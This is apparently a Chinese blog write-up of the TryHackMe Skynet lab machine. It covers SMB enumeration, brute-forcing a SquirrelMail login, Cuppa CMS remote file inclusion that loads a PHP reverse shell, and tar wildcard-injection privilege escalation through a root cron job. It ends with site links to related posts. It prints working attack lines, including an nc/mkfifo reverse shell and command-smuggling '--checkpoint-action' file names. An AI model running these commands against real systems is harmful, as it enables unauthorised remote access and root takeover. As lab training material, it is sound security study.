THM-Skynet-RFL-crontab通配符注入提权

已于 2024-01-20 19:30:23 修改
阅读量1.1k 收藏 31
点赞数 23
分类专栏: linux靶机 THM靶机 文章标签: 安全
于 2024-01-04 18:05:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangmahaonan/article/details/135391526
版权

1.端口扫描

2.漏洞利用

可以看到开启了80 139 445等常见端口,用dirsearch扫描一下web目录可以看到一个有东西的网页:http://10.10.202.27/squirrelmail/

这个登录页面用burp爆破了很久也进不去,卡了比较长时间,转而去看139和445端口

smbclient -L 10.10.202.27     //密码为空格

可以看到有个anonymous匿名用户和milesdyson用户

smbclient //10.10.202.27/anonymous      //密码为空格 

登录上去可以看到一个attention.txt和logs文件夹

logs文件夹中的log1.txt有内容,我们下载attention.txt和log1.txt查看

attention.txt中是Miles Dyson说最近系统损坏改了密码,而log1.txt是一个密码本,猜测Miles Dyson改完的密码就在log1.txt中,我们回到登录网页,用Burp再次爆破(注意username是milesdyson)

可以看到密码是cyborg007haloterminator,接着登录进去

注意到Samba Password reset可以重置SMB服务的密码,而我们前面看到的只有milesdyson用户,我们可以重置一下密码然后登录SMB服务

可以看到新密码是)s{A&2Z=F^n_E.B`

smbclient -U milesdyson //10.10.202.27/milesdyson    //密码为)s{A&2Z=F^n_E.B`

查看文件

进入notes目录

这里有个important.txt,将它下载下来查看

可以得到/45kra24zxs28v3yd这个目录,网页查看一下

没有什么有用信息,再用dirsearch扫描这个二级目录

得到一个新网页:http://10.10.202.27/45kra24zxs28v3yd/administrator

又是一个登录页面,上面提示了是Cuppa CMS,搜索一下相关漏洞,发现可以远程文件包含

利用LFI,可以下载木马文件到对方服务器上,具体payload如下

python -m http.server

http://10.10.202.27/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.93.221:8000/php-reverse-shell.php

nc -lnvp 1234

本地先开启http服务

输入url

本地开启nc监听1234端口

然后再次输入url即可收到反弹shell

3.Cron Jobs通配符注入

首先获得一个稳定一点的shell

python3 -c "import pty;pty.spawn('/bin/bash')"

cat /etc/crontab

查看定时任务

可以看到可疑文件backup.sh,查看内容

这个文件的作用是每隔一分钟将/var/www/html目录下的所有内容打包压缩到backup.tgz

查阅资料发现可以tar通配符注入:利用通配符进行Linux本地提权 - FreeBuf网络安全行业门户

cd /var/www/html

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.93.221 6666 >/tmp/f' > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

nc -lnvp 6666

 

yang_boxmaster
关注
  • 23
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP邮件Squirrelmail远程代码执行漏洞CVE-2017-7692 1.4.22以下版本均受影响 目前没有补丁...
weixin_34217773的博客
09-01 933
攻击者利用该漏洞可以越权执行任意代码,目前Squirrelmail 官方还没有发布相关修复补丁,但第三方提供了修复代码。绿盟科技发布漏洞预警通告,全文如下 北京时间4月19日晚,Squirrelmail被爆出存在一个远程代码执行漏洞(CVE-2017-7692,CNNVD-201704-561)。该漏洞是由于在传递一个字符串给popen调用之前,没有对其...
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1598
Vulnhub-CTF5靶机实战
SQL注入-基于MySQL的注入提权(十七)
Gjqhs的博客
02-22 3221
实验目的 普及结合dll文件对Windows系统进行UDF提权,掌握UDF提权的基本思路,熟悉UDF提权的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 提权 通过某种方式将低权限用户提升为高权限用户的过程。 注入提权 一般指的是在掌控了某数据库账户的情况下,通过SQL注入等方式提升该账户的权 限,进而夺得服务器(操作系统)的控制权 Windows2003操作系统—一默认用户 System:本地机器上拥有最高权限的用户,普通用户管理工具查看不到 Adminis
小白渗透0-1:BlackMarket靶场渗透记录
qq_49399033的博客
07-01 1242
这是一次BlackMarket靶场渗透记录
绿盟科技网络安全威胁周报2017.17 请关注Squirrelmail 远程代码执行漏洞CVE-2017-7692...
weixin_33857679的博客
09-01 907
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-17,绿盟科技漏洞库本周新增84条,其中高危40条。本次周报建议大家关注Squirrelmail 远程代码执行漏洞。SquirrelMail是以PHP编写的基于标准的webmail包。Squirrelmail 在1.4.22以前的版本中,由于在传递一个字符串给popen调用之前,没有对其进行过...
thm-discord-bot:TryHackMe Python Bot
01-28
不和谐机器人 TryHackMe Python不和谐机器人来源:由DarkStar7471 aka Jon创建 描述: 为在TryHackMe不和谐聊天服务器上使用而创建的机器人。 相关托管链接 ... 贡献者 黑暗之星7471 初始提交和创建,初始嵌齿轮和...
thm-scripts:TryHackMe-Python脚本
04-19
THM-脚本 Python脚本可获取某些TryHackMe房间的标志。 要求 所有脚本均在Python v3.6上进行了测试。 用法 python3.6 script_name.py 执照
THM3060--Reader-Source.rar_THM3060
07-15
THM3060读卡器的实现与解析》 在信息技术领域,硬件设备的驱动程序和应用程序的开发是至关重要的环节。本篇将详细探讨基于同方芯片THM3060的读卡器实现代码,以及相关知识点。 THM3060是一款由同方公司推出的高...
os-thm-js:Javascript和Web的开源主题
05-17
OS-THM JS Depcrapted see: https://github.com/ThatCakeID/os-thm-js/issues/3... 使用以下命令导入os-thm-js.js: 即将推出最低版本,敬请期待! 加入。 将稳定版与以下产品一起使用: [removed][removed] 将Be
thm-api-py:Python THM公共API包装器
05-27
thm = THM ( credentials = creds ) # Logging in is optional thm . get_stats () # {'publicRooms': 203, 'totalUsers': 88017, 'cloneableRooms': 967} 贡献 欢迎您使用您要查看的功能来创建“问题/拉动请求” ...
数据库注入提权总结(三)
蚁景网安学院
08-12 4881
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3052
Vulnhub-CTF4靶机实战
数据库注入提权总结(二)
蚁景网安学院
08-10 1084
MOF 提权是一个有历史的漏洞,基本上在 Windows Server 2003的环境下才可以成功。UDF说白了就是自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。......
绿盟科技网络安全威胁周报2017.16 建议关注Apache Log4j反序列化漏洞CVE-2017-5645
weixin_34409822的博客
09-01 512
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-16,绿盟科技漏洞库本周新增92条,其中高危39条。本次周报建议大家关注Apache Log4j反序列化漏洞。该漏洞主要是由于在处理ObjectInputStream时,接收器对于不可靠来源的input没有过滤。可以通过给TcpSocketServer和UdpSocketServer添加可配置...
提权注入进程提权
weixin_34008784的博客
12-31 589
注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 下面是图文教程。 0x01 从http://www.tarasco.org/security/Process_Injector/ 下载pinjecto...
MSSQL注入提权的一些方法
简单的快乐
01-20 7341
MSSQL注入提权的一些方法
提权之DLL注入
Ms08067安全实验室
03-23 1015
DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果进程中以过多的权限运行,那么可以会被攻击者加以利用,以便以DLL文件的...
Mssql 注入攻击,普通权限用户提权操作
瞎几把学
03-01 4973
如果该用户能够创建数据库的话use mastergocreate database bookgouse bookgoalter database book set RECOVERY FULLgocreate table cmd (a image)gobackup database book to disk='c:bookdb.bak' with initgobackup log book to disk='c:/book.bak' with initgoinsert into cmd (a) values(
soap注入某sql2008服务器结合msf进行提权
xiaoi123的博客
06-05 3215
原文作者:陈小兵    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例。1.1.1扫描soap注入漏洞    ...
THM3060 应用笔记Type A 应用说明
最新发布
11-29
"THM3060 应用笔记Type A 应用说明" 这篇文档是关于THM3060集成电路在处理ISO/IEC14443 Type A卡片应用时的详细指南,主要涵盖了该芯片如何支持ISO/IEC14443协议的A类标准以及相关的配置和操作流程。THM3060是一款...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值